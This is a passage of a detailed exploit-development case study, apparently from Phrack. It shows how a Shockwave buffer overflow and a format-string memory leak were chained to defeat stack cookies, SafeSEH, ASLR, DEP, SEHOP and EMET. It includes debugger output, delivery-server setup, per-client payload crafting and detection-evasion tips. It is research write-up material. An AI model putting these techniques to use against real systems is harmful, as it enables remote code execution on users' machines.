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Adobe Shockwave - A case study on memory disclosure

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Title : Adobe Shockwave - A case study on memory disclosure

Author : aaron portnoy

Date : May 28, 2014

|=---------------=[ The Art of Exploitation ]=---------------=|
|=------------------------=[ Adobe Shockwave ]=------------------------=|
|=----------------=[ A case study on memory disclosure ]=----------------=|
|=--------------------------=[ aaron portnoy ]=--------------------------=|
|=-------------------=[ deft_phrack at thunkers.net ]=-------------------=|

--[ Table of contents

1 - Introduction
2 - Shockwave Overview
2.1 - Deployment Notes
2.2 - Supported File Formats
2.3 - Creating Director Files
2.4 - Relevant Shockwave Modules
2.5 - The Lingo Scripting Language
3 - Vulnerability Discovery
3.2 - Stack-based Buffer Overflow
3.3 - Stack-based Memory Disclosure
3.3.1 - Undocumented Format Specifier
4 - Exploit Delivery
4.1 - Server-side Architecture
4.1.1 - web.py
4.1.2 - lighttpd
4.2 - The HTML
4.3 - The Javascript
4.4 - The Lingo
4.5 - The Python
5 - Vulnerability Exploitation
5.1 - Windows XP SP3 / Firefox / Shockwave
5.2 - Windows XP SP3 / Firefox / Shockwave
5.3 - Windows 7 x64 / Firefox / Shockwave
5.4 - Windows 7 x64 / Firefox / Shockwave / EMET 5.0
5.4.1 - Relevant 'EMET 5.0' Mitigations
5.5 - Windows 8 x64 / Firefox / Shockwave / EMET 5.0
5.5.1 - Relevant 'EMET 5.0 Tech Preview' Mitigations
6 - Future Work
7 - Conclusion
8 - Greets
9 - References
10 - Exploit

--[ 1 - Introduction

These days, proper exploit development on the latest and greatest operating
systems is a time-consuming task. It doesn't help matters that the
availability of public resources to help individuals research techniques to
achieve such ends are becoming scarce. There are many reasons why this is now
the case. Mainly, techniques to bypass security mitigations have become a
valuable commodity to various entities and as such are no longer released
as often for public dissemination or to further one's reputation.

I was lucky enough to get started in this field when there were resources
like Gera's insecure programming challenges [1], 29A [2], Uninformed [3], and
of course Phrack to inspire me. I've tried to imagine what it would be like
to be a newcomer in current times and it's a bit depressing that most (not
all) of the material that is actually published is done so with an unhealthy
bit of rodomontade and ulterior motives. Generally, the output lacks details
that are most facilitating to an aspiring researcher--the approaches to the
problem (including the failures) that so define how a so-called hacker really

This article is intended to give the reader insight into an approach to the
vulnerability discovery and exploitation process. By no means should the take-
away from this be that mitigations are broken or easily defeated, but rather
it serves as a case study demonstrating real-world vulnerabilities and the
process by which I was able to achieve successful code execution in spite of
various mitigations that have hitherto not been bypassed publicly.

What follows is walk through of the discovery and exploitation of a memory
disclosure vulnerability and a stack-based buffer overflow that together can
be abused to bypass stack cookies (/GS), SafeSEH (/SAFESEH), full process
Address Space Layout Randomization (ASLR, /DYNAMICBASE), Data Execution
Prevention (DEP), Structured Exception Handler Overwrite Protection (SEHOP),
and the Enhanced Mitigation Experience Toolkit (EMET) to gain reliable code
execution against a multitude of platforms, but with a focus on Windows 8

The bugs discussed herein were discovered by myself and where applicable I
will try to cite dates to help the reader understand the time invested to
create the end result. Hopefully there's something in here that you're able
to take away and I'd like to imagine one day you'll also share something with
those who come after you.

--[ 2 - Shockwave Overview

The vulnerabilities I'll be discussing are in Adobe's Shockwave Player [4], a
closed-source application used for viewing Adobe Director media files within
a browser. The player can be installed on Windows and Mac OS operating
systems and is deployed on over 450 million desktops according to Adobe [5].

Shockwave is often confused with Flash due to Flash's misleading MIME type
of 'application/x-shockwave-flash'. This is not the case, however, and the
technologies are entirely independent of each other (for the record,
Shockwave's MIME type is 'application/x-director').

----[ 2.1 - Deployment Notes

The Shockwave Player is invoked differently depending on which browser/OS
you're running. For example, in the case of Internet Explorer the Shockwave
ActiveX control is instantiated and the Adobe modules are loaded into the
iexplore.exe process space. However, in the case of Firefox, plugins are
loaded via NPAPI [6] and occupy a new child process called

By default, if a user visits the Shockwave installer site, they are served up
the "slim" version of the installer. The difference between the slim and the
full is that the slim does not contain all the functionality for various
media types (instead they are downloaded when the Player tries to render a
media file with such content).

It should also be noted that the code is distributed as a 32-bit build, even
if deployed on a 64-bit operating system.

----[ 2.2 - Supported File Formats

Shockwave is used to render Adobe Director files. These come in three forms:

- .dir is an uncompressed Director file
- .dcr is Director file compressed in various locations using zlib
- .dxr is a non-editable Director file

Each of these are undocumented but are based off of the RIFF file format
(except that their data is stored in big endian as denoted by the file
magic value of 'RIFX').

For example, a partial hex dump of a .dir file:

Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 58 46 49 52 78 62 05 00 33 39 56 4D 70 61 6D 69 XFIRxb..39VMpami
00000010 18 00 00 00 01 00 00 00 26 8B 00 00 82 07 00 00 ........&`..`...
00000020 00 00 00 00 00 00 00 00 00 00 00 00 2A 59 45 4B ............*YEK
00000030 74 01 00 00 0C 00 0C 00 1E 00 00 00 17 00 00 00 t...............
00000040 3E 00 00 00 04 00 00 00 6D 75 68 54 0D 00 00 00 >.......muhT....
00000050 04 00 00 00 44 45 4D 58 2B 00 00 00 4B 00 00 00 ....DEMX+...K...
00000060 6D 75 68 54 6D 00 00 00 4B 00 00 00 44 45 4D 58 muhTm...K...DEMX

The .DCR format is useful for bypassing network detection, as no
device/software I am aware of currently knows how to decompress this
proprietary format.

----[ 2.3 - Creating Director Files

Director files are created in, appropriately, Adobe Director [7]. The
interface is very similar to Flash Studio in that there are frames, a movie
object, a stage, cast members, sprites, and script objects.

One quirk worth mentioning is that by default, when 'playing' a file within
Director it uses an older version of the Shockwave libraries (not the ones in
the player's default directory). I'm guessing that this might not be the case
if you're using the latest Director (version 12), but as I was using warez,
well, ... you get it. This can impact your exploit development so ensure you
test outside Director as well (or overwrite the appropriate modules with
newer versions).

----[ 2.4 - Relevant Shockwave Modules

There are two main modules that Shockwave uses to handle parsing and
rendering of DIR files: DIRAPI.dll and IML32.dll. I did a bit of research on
these back in 2011 [8]. Shockwave uses a custom memory manager called
Smartheap [9], but that isn't really of much interest with regard to the
vulnerabilities described in this article.

In addition to those two modules, there are also a number of "Xtras". These
files have .x32 extensions but are simply DLL files. They provide added
functionality for things like embedded media (Quicktime, Flash, 3D objects,
fonts, audio, and so on).

----[ 2.5 - The Lingo Scripting Language

Shockwave files have support for a built-in scripting language called Lingo
which was created in the 1990s and, according to the inventor John Thompson,
was his "...most significant contribution to the computer industry to
date" [10].

Lingo enables a Director developer to interact with multimedia elements and
the user. Its intended functionality is very similar to its Adobe Flash
counterpart, Actionscript. Its syntax, however, is a bit different. There is
an API reference available on Adobe's site [11] that covers mostly everything
you'd need to know about it.

We'll soon see that Lingo can provide an attacker with a wealth of information
to aid in the exploitation process.

--[ 3 - Vulnerability Discovery

I had previously spent a good amount of time bug hunting in Shockwave for a
presentation at CanSecWest and had unearthed a few file format
vulnerabilities. The problem with those, however, is that anybody with the
ability to bit-flip a file can also stumble upon them trivially. So, this
time around I decided to see what I could find in Lingo.

One of the most tedious aspects of bug hunting is figuring out the best way
to generate input to properly cover as much of the attack surface as
possible. My first attempt at this was to don my hipster jeans and learn to
develop Director movies legitimately. I tried to embed as much content as
possible and ensured in a debugger that the appropriate Xtras were being
loaded into the process. The hardest part was learning how to properly access
the objects via Lingo and interact with them in the hopes of causing a fault.

After exhausting as many Lingo methods as I could manage to invoke (it's a
long list, check out: http://help.adobe.com/en_US/Director/11.5/UsingScripting
/WSc3ff6d0ea77859461172e0811d64c1a1b3-7ff4.html) I sat back and considered
what to do next.

Following reflection upon my prior attempts, I realized that the one subset
of the available Lingo methods that I was unable to invoke were related to
the 3D API. As it turns out, I was unable to call Lingo's 3D methods because I
could not embed a proper 3D object and initialize the environment as was

I decided the best approach was to find an existing Director file that
already had 3D objects and associated Lingo code in it. After searching a
while I found that Director itself comes with some tutorial files that fit
the need. In the

%ProgramFiles%\Adobe\Adobe Director 11\Configuration\Tutorials\3D

folder are the .dir files I was hoping to find. Once they were loaded into
Director I found the Lingo scripts I could simply modify to invoke the
methods I had previously overlooked.

----[ 3.2 - Stack-based Buffer Overflow

The first vulnerability I discovered was a stack-based buffer overflow that
could be reached via two different Lingo methods (they hit the same
vulnerable code, so I consider them the same bug). The vulnerable methods

- physicsWorld.loadProxyTemplate(string proxyname, 3dmember)
- world.createRigidBody(string rigidbodyname, string 3Dmodelname,
symbolBodyProxy, symbol bodyType, symbol flipNormals)

When provided with a large enough string as the first parameter to either of
these a buffer on the stack can be overflowed.

In order to craft a large string in Lingo, you can use their equivalent of a
for loop:

buf = ""
repeat with i = 0 to 10000
buf = buf & "$"
end repeat

Depending on how much data is provided, the fault that the debugger catches
may differ. Here's one such crash:

(63c.410): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37734236 ebx=02f6bd10 ecx=00000000 edx=03790404 esi=000033a7 edi=02f6c248
eip=6fde9d0a esp=02f6b7ec ebp=02f6b7ec iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
6fde9d0a 81780454534146 cmp dword ptr [eax+4],46415354h ds:002b:3773423a

OK, from the faulting instruction alone there is not much to deduce. The call
stack tells us a bit more:

0:005> kv
ChildEBP RetAddr Args to Child
02f6b7ec 6f2277b8 37734236 02f6b810 6f2283b1 IML32!Ordinal1115+0xa
02f6b7f8 6f2283b1 02f6c248 06cf7024 00000000 DIRAPI+0x377b8
02f6b810 6f23a8ea 06cf7024 000033a7 02f6bd10 DIRAPI+0x383b1
02f6b82c 6f35ec15 06cf7024 02f6c248 02f6bd10 DIRAPI+0x4a8ea
02f6b848 6e73250b 06ced4bc 02f6c248 02f6bd10 DIRAPI+0x16ec15
02f6c114 42346942 69423569 37694236 42386942 Dynamiks+0x335e
02f6c118 69423569 37694236 42386942 6a423969 0x42346942
02f6c11c 37694236 42386942 6a423969 316a4230 0x69423569
02f6c120 42386942 6a423969 316a4230 42326a42 0x37694236
02f6c124 6a423969 316a4230 42326a42 6a42336a 0x42386942
02f6c128 316a4230 42326a42 6a42336a 356a4234 0x6a423969
02f6c12c 42326a42 6a42336a 356a4234 42366a42 0x316a4230

The first thing that jumps out here is that there are what appear to be 5
fully intact frames before the stack is smashed. That tells us that the
destination buffer likely originates in the Dynamiks module.

We can also see that there are two stack pointers passed as arguments from
Dynamiks. Inspecting these we can see which was the destination buffer (we
could also deduce this from the frame pointers we see in the call stack...
i.e. it's unlikely to be 0x02f6c248 because the corruption began lower on the

0:005> dc 02f6c248 L8
02f6c248 73423573 37734236 42387342 74423973 s5Bs6Bs7Bs8Bs9Bt
02f6c258 31744230 42327442 74423374 35744234 0Bt1Bt2Bt3Bt4Bt5
0:005> dc 02f6bd10 L8
02f6bd10 41306141 61413161 33614132 41346141 Aa0Aa1Aa2Aa3Aa4A <- beginning
02f6bd20 61413561 37614136 41386141 62413961 a5Aa6Aa7Aa8Aa9Ab of our buf

So, the stack buffer begins at 0x02f6bd10 and was passed from the Dynamiks
module into DIRAPI as argument 3. This can be seen by disassembling the
Dynamiks module and checking out the code before offset 0x335e:

(Dynamiks.x32: md5sum c6a9a75deb3da27682c267a7a2507e16, checksum 2a30eb,
Shockwave version

0:005> ub Dynamiks+0x335e L6
709e334f 8d8dfcfbffff lea ecx,[ebp-404h] <--- vulnerable buffer
709e3355 51 push ecx <-------------- passed as third argument
709e3356 8d4f08 lea ecx,[edi+8]
709e3359 51 push ecx
709e335a 50 push eax
709e335b ff5244 call dword ptr [edx+44h]

In a real disassembler (IDA Pro) we can see how large that local variable is
by checking out the function's stack:

-00000404 var_404 db 1024 dup(?) <--- vuln buffer, 1024 bytes
-00000004 var_4 dd ?
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
+00000008 arg_0 dd ?
+0000000C arg_4 dd ?
+00000010 arg_8 dd ?
+00000014 arg_C dd ?
+00000018 arg_10 dd ?

Any string over 1024 bytes in size will corrupt var_4. Any guess as to what
var_4 is? Yep... say hello to the /GS mitigation:

(Dynamiks.x32: base address 0x10000000)

.text:100018A8 mov eax, ___security_cookie
.text:100018AD xor eax, ebp
.text:100018AF mov [ebp+var_4], eax

For those of you not familiar with /GS [12] it is a compiler option that is
on by default in any recent version of Visual Studio. It works by ... well,
skape said it much better than I in his Uninformed [13] article when
describing stack cookie initialization:

"At a high-level, this routine will take an XOR'd combination of the current
system time, process identifier, thread identifier, tick count, and
performance counter. The end result of XOR'ing these values together is what
ends up being the image file's security cookie."

The result of those operations is a 4-byte value that gets generated when the
module is loaded and then stored in its .data section. Any function the
compiler deems in need of some extra protection takes that value and XORs it
again with the current frame pointer (@ebp). It then stores it on the stack
as the first local variable. Upon function exit, the process checks if it has
been tampered with and, if so, throws an exception which usually results in
process termination.

Had we not caused an exception in IML32.dll the code would still return back
to the Dynamiks module and upon function exit (provided it doesn't access any
other invalid data long the way), the stack cookie check would fail and the
process would throw an exception and probably exit. Either way, this is an
obstacle we'll need to bypass.

We'll get back to this in a bit.

----[ 3.3 - Stack-based Memory Disclosure

In the course of testing the 3D Lingo methods, I was using a string
consisting of a large amount of the "%x" characters. I was lucky enough to
also be outputting objects to the Messages window via Lingo's trace()
function. In a few cases I saw some very interesting output, such as the


That was certainly not the name I gave that object when I called newModel()...

Separating those %x values by spaces yielded:

model("d03e68 6317e44 5ffad60 43 6317dcc 680fb8a9 d03e68 42 680276b0 12d450
d03e68 69080b00 5711164 100c 17eb90 69056cd5 6908db38 1 1038")

At this point I was testing all of this on Windows XP and thus there was no
Address Space Layout Randomization to worry about. With that in mind, I'll
tell you that DIRAPI.dll has a preferred base address of 0x68000000 and
IML32.dll of 0x69000000. Looking at the output from the trace() call we can
clearly see that we're dealing with a format string vulnerability and for
each %x we provide, we're returned a 32 bit value off the stack.

As the code path to reach this vulnerability is deterministic, it can be
verified that the code pointers will always be the same on a non-ASLR'd
system. Thus, we can disclose the base addresses of at least two modules as
well as what look to be heap and stack pointers. We can verify the addresses
in a debugger:

0:008> !address 0xd03e68
00c60000 : 00c60000 - 00101000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 00150000
0:008> !heap -p -a 0xd03e68
address 00d03e68 found in
_HEAP @ 150000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
00c60018 20000 0000 [0b] 00c60020 100000 - (busy VirtualAlloc)
? <Unloaded_ame.dll>+ffff7
0:008> !address 6317e44
06010000 : 06314000 - 0005b000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 00150000
0:008> !address 5ffad60
05f00000 : 05f00000 - 00101000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 00150000
0:008> !address 12d450
00030000 : 0011e000 - 00012000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageStack
Pid.Tid d1c.89c
0:008> !address 69080b00
69000000 : 69001000 - 0008c000
Type 01000000 MEM_IMAGE
Protect 00000020 PAGE_EXECUTE_READ
State 00001000 MEM_COMMIT
Usage RegionUsageImage
FullPath <snip>IML32.dll
0:008> ub 69056cd5 L1
69056cd3 ffd5 call ebp

One thing worth pointing out there is that the heap pointers originate from
an allocation of size 0x100000. This is due to the Smartheap slicing out
allocations from its own arena of that size.

Anyway, the take-away here is that I was able to leak an address from the
stack, two from the heap, and one from a module (IML32.dll).

------[ 3.3.1 - Undocumented Format Specifier

During my initial attempt at exploitation of these issues, I was having
trouble locating a reliable stack pivot within the one module I was able to
leak an address from (IML32.dll). After struggling with that problem for
about one week, I went back and began reverse engineering the root cause of
the memory disclosure and came across some undocumented functionality in

When provided with a "%v" format specifier, the code within DIRAPI.dll
replaces it with <%d %p>:

(DIRAPI.dll: base address 0x68000000, md5sum fb5405cef8b2d6273c593477392cbc88,
checksum 1c266b, Shockwave version

.text:68039FF2 case__v:
.text:68039FF2 add edi, 4 ; jumptable 68039EC7 case 35
.text:68039FF5 mov [ebp+var_814], edi
.text:68039FFB mov edi, [edi]
.text:68039FFD lea esi, [ebp+var_810]
.text:6803A003 mov byte ptr [ebp+var_404], 0
.text:6803A00A call sub_68039CA0
.text:6803A00F test eax, eax
.text:6803A011 jz loc_6803A0EA
.text:6803A017 mov eax, [ebp+arg_8]
.text:6803A01A mov ecx, [ebp+var_824]
.text:6803A020 mov edx, [ebp+var_828]
.text:6803A026 push eax
.text:6803A027 push ecx
.text:6803A028 push edi
.text:6803A029 push edx
.text:6803A02A call sub_68030DB0 ; replaces %v with <%d %p> and
.text:6803A02A re-enters this func

By placing %v characters at specific locations in the input string I was able
to force a dereference of one of the stack values and retrieve two 32-bit
integers from there, which yielded me an additional address within a module.
Specifically, I was able to leak an address within the
"Shockwave 3d Asset.x32" module which, it turned out, had a quite useful
code primitive I abused for a stack pivot.

--[ 4 - Exploit Delivery

The exploits discussed herein were progressively developed, with differing
approaches as obstacles were encountered. I've included explanations of all
of them to allow the reader to gain some insight into the process rather than
just delivering an explanation of what came to be the best solution. In fact,
the attached exploit code has not been "cleaned up", instead it contains all
the artifacts of a work-in-progress leading up to the final solution.

----[ 4.1 - Server-side Architecture

As some of the exploits have different required architecture, I will cover
all the components I utilized throughout the exploitation process.

------[ 4.1.1 - web.py

I used web.py[14] to serve the following:

* HTML pages that embedded the .dir files
* Director files
* A payload in one of the exploits

The included exploit has the following directory structure:

| craft_exploit.py
| main.py
| (web.py library code)
| input.dir
| mem_disc.dir
| output.dir
| exploit.html
| index.html

It is also worth noting that I also added code to handle serving gzip-encoded
data to my main.py as I encountered some unreliability with regard to web.py
and its serving of large files.

------[ 4.1.2 - lighttpd

During one stage of the exploit development process, the code required a WebDAV
server to host a payload. For that, I used lighttpd[15] with the following

server.document-root = "/htdocs"
server.port = 80
server.username = "nobody"
server.groupname = "nogroup"

mimetype.assign = (".html" => "text/html",
".application" => "application/x-ms-application")

server.modules = ( "mod_webdav",

server.errorlog = "/logs/error.log"
accesslog.filename = "/logs/access.log"

webdav.activate = "enable"
webdav.sqlite-db-name = "/lock/lighttpd.webdav_lock.db"

----[ 4.2 - The HTML

The HTML is pretty basic and consists of an index.html that embeds the .dir
file responsible for memory disclosure and an iframe that is dynamically
populated with the exploit.html page, which in turn embeds the crafted .dir
exploit for that particular client, on demand.

The iframe was required as it was noted that if one was not used, modules in
memory were loaded and unloaded at potentially different addresses if the
browser navigated away from one page, thus rendering the memory disclosure

----[ 4.3 - The Javascript

The index.html page contains the javascript functions responsible for the

* Receiving disclosed memory contents provided by the mem_disc.dir file
* Receiving and parsing version, platform, and user agent information
* POST-ing to itself in order to get such data back to main.py

----[ 4.4 - The Lingo

There are a couple of Lingo functions and properties that are exceptionally
friendly for the exploit developer. The following are used to determine how
to craft the malicious .dir file for a given client and then transport that
information to the server:

* goToNetPage - function used to call javascript from the .dir
* environmentPropList - property used to obtain platform, operating system
information, and shockwave build version

----[ 4.5 - The Python

The craft_exploit.py handles construction of a custom .dir file per client
request. It receives leaked memory addresses, browser user agent, shockwave
version, and platform information from the aforementioned POST request.

The CraftExploit class defined within contains two class variables of note.
The self.int_mods list is populated with tuples containing the file offset
within the template .dir file and the value to inject. For example, the
first stack pivot used corresponds to offset 0x55AFC in the file. The relevant
code that replaces that value in the template .dir file looks like this:

self.int_mods.append((0x55AFC, self.sw_3d+0x13e522))

The above will cause the resulting .dir file at offset 0x55AFC to contain a
pointer to the "Shockwave 3d Asset.x32" at offset 0x13e522.

The other notable class variable is self.str_mods which does much the same
thing, except that it is implemented as a dictionary. For example, in order
to ensure that a string value will exist at a given offset in the resulting
.dir file, one can utilize str_mods as so:

self.str_mods[0x536D0] = 'urlmon.dll\x00'

The contents of str_mods and int_mods are injected into the file using
CraftExploit's render method and then served to the target client via the
web server.

--[ 5 - Vulnerability Exploitation

The following sections will walk the reader through my exploit development
process against various configurations, bypassing mitigations as encountered.

----[ 5.1 - Windows XP SP3/Firefox/Shockwave

This was the first exploit I wrote for this issue, and as I was developing it
on Windows XP SP3 I did not need to worry about ASLR (or even use the memory
disclosure vulnerability). This was written the day the bug was discovered
with the intent of exploiting the issue quickly, not reliably.

As the vulnerable code is protected by /GS, I opted to overwrite one of the
saved exception handlers on the stack. The executable was also compiled with
SafeSEH, for which bypasses has been covered extensively by others. In short,
I pointed the corrupted handler to an address inside a module that did not
make available the addresses of its exception handling functions (for WinDBG
users, I recommend checking out the narly[16] plugin that helps determine
which addresses are available for such a bypass). Thus, the exception
dispatcher was unable to determine if my corrupted pointer was legitimate and
would proceed to call it.

I then gained stack control and, after some ROP-ing, VirtualProtectEx'd the
stack and returned to it, executing a payload that simply ran

I relied on several things that make this exploit... dirty:

* The modules I used to ROP with were getting their preferred base
addresses, and thus I could easily ignore ASLR.
* I used a system library, shell32.dll, for some primitives. This module is
updated by Microsoft often and is not something to rely on.

So, to summarize, this exploit bypasses /GS, SafeSEH, DEP, and ignores ASLR
(but is more of a PoC than a proper exploit--and well, it's XP).

----[ 5.2 - Windows XP SP3/Firefox/Shockwave

About a day after I wrote the exploit for version Adobe released For completeness' sake, I added support to my exploit for what
was the latest version, using identical primitives, differing just in
location. See the attached exploit for details.

----[ 5.3 - Windows 7 x64/Firefox/Shockwave

When Adobe released version, I decided to utilize the memory
disclosure bug and exploit the vulnerabilities on a more modern operating
system, Windows 7.

This time, I used the stack memory disclosure to remove any reliance on
indeterminable memory addresses, thus bypassing ASLR. Unlike the prior
exploits, this version simply ROPs to a LoadLibraryA call and requests DLL
over a UNC path. I created a simple DLL that just calls WinExec("calc.exe")
upon load. Then, using lighttpd as described in 4.1.2, the file is served.

----[ 5.4 - Windows 7 x64/Firefox/Shockwave 5.0

The above exploit against Windows 7 x64 uses LoadLibraryA to load a malicious
payload off of a UNC share. EMET removes the ability to do this, but it
is easy enough to bypass, as detailed in the following section.

------[ 5.5.1 - Relevant 'EMET 5.0' Mitigations

The exploit for the same target with EMET 5.0 enabled simply calls MoveFileA
first to move the file from the remote WebDAV to the local filesystem and
then calls LoadLibraryA on the local file.

Protip: chattr +i the DLL file on the server so that the MoveFileA will move
it but won't be able to delete it afterwards, enabling subsequent exploit
attempts to work without a problem. You could also do this within the
lighttpd config.

Also, EMET implements a mitigation they call Export Address Table
Filtering[17] which monitors for read accesses to the exported function
addresses in key system DLL modules. However, the attached exploit retrieves
the addresses of functions by snagging a pointer via the Shockwave modules'
import section (which are not monitored by EMET), rather than from the system
DLL files themselves.

----[ 5.5 - Windows 8 x64/Firefox/Shockwave 5.0

Windows 8 introduces a number of exploit mitigations, thoroughly summarized
by Matt Miller and Ken Johnson during their Blackhat talk in 2012 [18]. The
most obtrusive mitigation that had to be overcome was SEHOP. SEHOP is another
mitigation intended to deter exploitation of SEH-based corruption. As
Microsoft describes [19]:

"The first step involves the insertion of a symbolic exception registration
record as the tail record in a thread's exception handler list. This step
occurs when a thread first begins executing in user mode. Since exception
registration records are always inserted at the head of the exception handler
list, the symbolic record is guaranteed to be the final exception
registration record.

The second step consists of walking the exception handler list at the time
that an exception is being dispatched to ensure that the symbolic record can
be reached and that it is valid. This step happens when the exception
dispatcher is notified that an exception has occurred in user mode. If the
symbolic record cannot be reached, the exception dispatcher can assume that
the exception handler list is corrupt and that an SEH overwrite may have
occurred. The exception dispatcher is then able to safely terminate the
process. If the symbolic record is found, the exception dispatcher is able to
proceed as it normally would and call each of the registered exception

In order to bypass this mitigation, you pretty much need a memory disclosure.
Luckily for me, the leaking of a stack address makes this possible.

To demonstrate how such a mitigation is bypassed, the following will walk
through inspecting the exception chain before and after the exploit corrupts

Firstly, once attached to the Firefox process, we can tell WinDBG to follow
child processes with the '.childdbg 1' command. Next we point Firefox to the
malicious server which will cause the Shockwave player to be invoked, thus
launching the plugin-container.exe process from Firefox:

0:029> .childdbg 1
Processes created by the current process will be debugged
0:029> g
ModLoad: 70b30000 70b63000 C:\Windows\SysWOW64\shdocvw.dll
ModLoad: 09c70000 09c76000 plugin-container.exe
Executable search path is:
ModLoad: 00fa0000 00fa6000 plugin-container.exe
ModLoad: 772f0000 77447000 ntdll.dll
ModLoad: 76620000 76750000 C:\Windows\SysWOW64\KERNEL32.DLL
ModLoad: 74f10000 74fb6000 C:\Windows\SysWOW64\KERNELBASE.dll
ModLoad: 74980000 74989000 C:\Windows\SysWOW64\CRYPTBASE.dll
ModLoad: 74920000 74971000 C:\Windows\SysWOW64\bcryptPrimitives.dll
(834.950): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000003 ecx=a1500000 edx=00000000 esi=00000000 edi=007e0000
eip=77390545 esp=007bf854 ebp=007bf880 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
77390545 cc int 3

In order to inspect the untainted exception chain, we can ask WinDBG to next
break upon loading of the Dynamiks.x32 module using:

1:032> sxe ld:dynamiks
1:032> g
(740.1f0): Unknown exception - code 000006ba (first chance)
ModLoad: 709e0000 70c81000 C:\Users\user\AppData\LocalLow\Adobe\Shockwave
Player 12\xtras\download\AdobeSystemsIncorporated\Dynamiks\Dynamiks.x32
eax=00000000 ebx=00800000 ecx=00000000 edx=00000000 esi=00000000 edi=fe9bf000
eip=77e20fe8 esp=0061a944 ebp=0061a99c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
77e20fe8 c22800 ret 28h
1:032> bp !Dynamiks+0x335b
1:032> g
Breakpoint 0 hit
eax=0506ba80 ebx=00000000 ecx=0061ca6c edx=71407620 esi=050003a0 edi=0061ca64
eip=709e335b esp=0061c074 ebp=0061c938 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
709e335b ff5244 call dword ptr [edx+44h] ds:002b:71407664=713debe0

We can view the current exception chain with the !exchain command:

1:032> !exchain
0061ef40: USER32!_except_handler4+0 (775f3991)
0061efa4: USER32!_except_handler4+0 (775f3991)
0061f000: ntdll!KiUserCallbackExceptionHandler+0 (77e22e60)
0061f0fc: xul!std::_Mutex::_Mutex+56d (73920859)
0061f858: plugin_container+18f9 (010b18f9)
0061f8a8: ntdll!_except_handler4+0 (77ec35f2)
0061f8c8: ntdll!FinalExceptionHandler+0 (77eb1d86)
Invalid exception stack at ffffffff

For those unfamiliar with the above formatted information, the first number
is the address on the stack of the SEH record. For example, for the first
entry we can inspect the record and verify that the first 32 bit value points
to the next SEH record address on the stack, and that the second 32 bit value
points to the code responsible for handling the exception:

1:032> dd 0061ef40 L2
0061ef40 0061efa4 775f3991
1:032> u poi(0061ef40+4) L4
775f3991 8bff mov edi,edi
775f3993 55 push ebp
775f3994 8bec mov ebp,esp
775f3996 83ec14 sub esp,14h

Prior to corruption, the SEH record chain consists of the following stack
locations, terminated by -1:


At this point, we also know the address of the destination buffer that will be
overflowed (see section 3.2):

1:032> dd @esp+0x8 L1
0061c07c 0061c534

We can calculate how much data is required to be copied from that address to
reach the first SEH record on the stack:

1:032> ? 0061ef40-0061c534
Evaluate expression: 10764 = 00002a0c

Now comes the fun part. The exception chain validation that occurs when
ntdll!KiUserExceptionDispatcher doesn't care how many entries are in the
chain. What this means is that an attacker has some flexibility with
regard to how they choose to bypass the checks. For example, the stack
corruption could be used to link the first exception handler
(USER32!_except_handler4) all the way to the last one
(ntdll!FinalExceptionHandler) by modifying the first's *next pointer.
Another option (and the one that I chose) is to craft a fake SEH record,
link a prior record to yours, and link yours to an existing one located
further down the stack. To illustrate this, the below shows the state of the
exception chain after attempting to step over the call that causes the
stack-based buffer overflow:

1:032> p
(740.1f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37734236 ebx=0061c534 ecx=00000000 edx=00e5eff4 esi=00002af8 edi=0061ca6c
eip=71439d0a esp=0061c010 ebp=0061c010 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
71439d0a 81780454534146 cmp dword ptr [eax+4],46415354h ds:002b:3773423a=??
1:032> !exchain
0061ef40: Shockwave_3d_Asset!CIFXString::SetCodePage+49122 (70f2e522)
0061ef50: 41414141
0061f0fc: xul!std::_Mutex::_Mutex+56d (73920859)
0061f858: plugin_container+18f9 (010b18f9)
0061f8a8: ntdll!_except_handler4+0 (77ec35f2)
0061f8c8: ntdll!FinalExceptionHandler+0 (77eb1d86)
Invalid exception stack at ffffffff

Note that now the SEH chain consists of:


What has occured is the first SEH record has been corrupted to point into the
"Shockwave 3d Asset.x32" module (this is our stack pivot--more on this later)
and it's *next pointer has been modified to point to a new address on the
stack (calculated using the stack memory disclosure).

The second record shown above is a fake one that my exploit crafts to re-link
the chain. Its *next pointer has been crafted to point to 0061f0fc which is
a valid SEH record that existed prior to the corruption. Note that its code
pointer was simply set to 0x41414141, which is weakly validated by ntdll's
exception dispatcher to ensure it is not located on the stack.

At this stage, the SEH chain will pass SEHOP validation and the first
record's code will be called. This can be verified in the debugger:

1:032> bp Shockwave_3d_Asset!CIFXString::SetCodePage+49122
1:032> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=70f2e522 edx=77e23105 esi=00000000 edi=00000000
eip=70f2e522 esp=0061ba5c ebp=0061ba7c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
70f2e522 8b4d0c mov ecx,dword ptr [ebp+0Ch] ss:002b:0061ba88=0061ef40

------[ 5.5.1 - Relevant 'EMET 5.0 Tech Preview' Mitigations

EMET 5.0 implements many mitigations that were submitted as 'defensive
security research' to the Microsoft BlueHat Prize Contest (over $250,000 was
awarded). The software is still in Tech Preview, but I was curious as to how
difficult it would be to bypass. I was also a bit irked that my prior
